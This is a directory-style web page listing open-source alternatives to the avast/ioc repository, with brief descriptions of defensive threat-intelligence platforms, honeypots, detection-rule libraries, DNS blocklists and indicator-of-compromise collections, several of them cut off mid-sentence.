30 open-source projects similar to avast/ioc, ranked by how many features they have in common. Compare stars, activity and what each one does to find the best Ioc alternative.
MISP is an open-source threat intelligence sharing platform designed for collecting, storing, and distributing structured threat indicators and intelligence. At its core, it provides a distributed synchronization protocol for transferring events between instances, an attribute-based correlation engine that links matching indicators across events, and a REST API with an OpenAPI specification for programmatic access to threat data. The platform uses formal data formats for JSON, taxonomy, galaxy, and object templates to enable compatibility across tools and communities. The platform distinguish
T-Pot is a multi-honeypot orchestration platform and threat intelligence collector. It utilizes a Docker-based security sandbox to deploy and manage a collection of diverse decoy services that simulate vulnerable targets to lure attackers and record their activity. The system features a distributed sensor network where remote nodes capture attack logs and transmit them via encrypted communication to a central hub. This central hub employs an analytics stack to transform raw logs into geographic maps and interactive dashboards for adversary behavior visualization. To increase the realism of si
T-Pot is a multi-honeypot platform and threat intelligence framework that deploys a collection of containerized decoy services to capture attacker behavior and network telemetry. It functions as a Docker-based deception system, simulating vulnerable network environments to gather intelligence on threat actors. The system features a distributed sensor network using a hub-and-spoke architecture, allowing remote sensors to transmit logs back to a central management hub. It integrates large language models to create a dynamic deception engine capable of adaptive interactions with attackers. The
TheHive is a security incident response platform and multi-tenant case management system. It functions as a Security Orchestration, Automation, and Response (SOAR) tool and a threat intelligence platform designed to coordinate security investigations by managing alerts, cases, and observables. The platform is distinguished by its multi-tenant architecture, which isolates data across different organizations while supporting selective cross-tenant sharing. It features a SOAR automation engine capable of executing sandboxed JavaScript logic to automate workflows and trigger response actions thro
This project is a detection-as-code framework providing a library of security monitoring rules and predefined detection content for Elasticsearch data indices. It serves as a threat detection rule library designed to identify malicious activity and attack patterns across diverse data streams in cloud and on-premises environments. The framework implements a detection engineering workflow where rules are defined in YAML and managed as versioned code. It includes a set of command-line utilities for automated rule deployment, metadata searching, and template generation, supported by a Python-base
Lists is a curated collection of DNS blocklists, a domain blocklist generator, and a categorized library of domains used for network content filtering. The project provides a command-line pipeline that aggregates upstream sources to build and validate blocklists used to redirect unwanted traffic to null addresses. The project distinguishes itself through a CLI-driven build pipeline that automates the fetching, validation, and daily regeneration of datasets. It organizes domains into discrete functional categories rather than a single monolithic list and exports them in multiple syntaxes, incl
This is where I'll post IOCs from malware investigations
Indicators of Compromises (IOC) of our various investigations
This project is a comprehensive repository of curated domain blocklists designed for network-wide DNS filtering. It functions as a DNS sinkhole feed, providing the necessary data to intercept and block unwanted network requests at the resolution layer before they reach their destination. By returning null or loopback addresses for identified domains, it prevents connections to malicious infrastructure, advertising servers, and tracking endpoints across all devices on a network. The repository distinguishes itself through a tiered categorization logic that allows users to select protection lev
This is the repository for indicators of compromise (IOCs) and other data supporting threat intelligence articles posted on the Palo Alto Networks Unit 42 website.
This project is a curated, version-controlled directory of software and resources designed for cybersecurity professionals and researchers. It functions as a centralized knowledge base that aggregates and organizes external security utilities into a structured taxonomy to facilitate discovery and access for specialized research and testing tasks. The repository distinguishes itself through a community-driven model where external resource locations are verified and maintained by contributors. By leveraging a distributed version control system, the project ensures the historical integrity and c
Blocklist for newly created scam, phishing, and other malicious domains automatically retrieved daily using Google Search API, automated detection, and public databases.
Tool to gather Threat Intelligence indicators from publicly available sources
C2 Tracker is a free-to-use-community-driven IOC feed that uses Shodan ~~and Censys~~ searches to collect IP addresses of known malware/botnet/C2 infrastructure.
A repository of extracted content from thousands of threat intelligence reports, with an automatic extraction of reports from various feeds !
Sigma is a generic SIEM signature format and log event pattern standard used to describe malicious activity. It provides a vendor-neutral system for defining security event patterns in YAML, ensuring that detection logic remains portable across different monitoring platforms. The project maintains a curated library of peer-reviewed detection rules that identify threats and compliance violations. This standardized approach allows for the exchange of threat hunting logic and the translation of generic signatures into specific queries for various security information and event management systems
Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments. #nsacyber
Multithreaded threat Intelligence gathering built with Python3
IntelOwl is a threat intelligence platform and security orchestration engine designed to aggregate, analyze, and enrich security observables. It functions as a security incident investigation tool and a threat intelligence aggregator, collecting data on files, domains, and IP addresses from diverse internal and external sources. The system differentiates itself through playbook-based workflow automation, allowing users to define reusable sequences of analysis tasks that trigger subsequent jobs based on prior outputs. It unifies disparate security data into a common schema and utilizes protoco
This repository contains files with indicators supporting social media posts designed to disseminate timely threat intelligence data from Palo Alto Network's Unit 42 team.
//////////////// ////////////////////// // //////////////////////// // /// /////// ///// /////// /////// /////// /////// //////// //////// //////// //////// //////// //////// //////// //////// //////// //////// /////// /////// /////// /////// ///// // ////// // // /////////////////////////…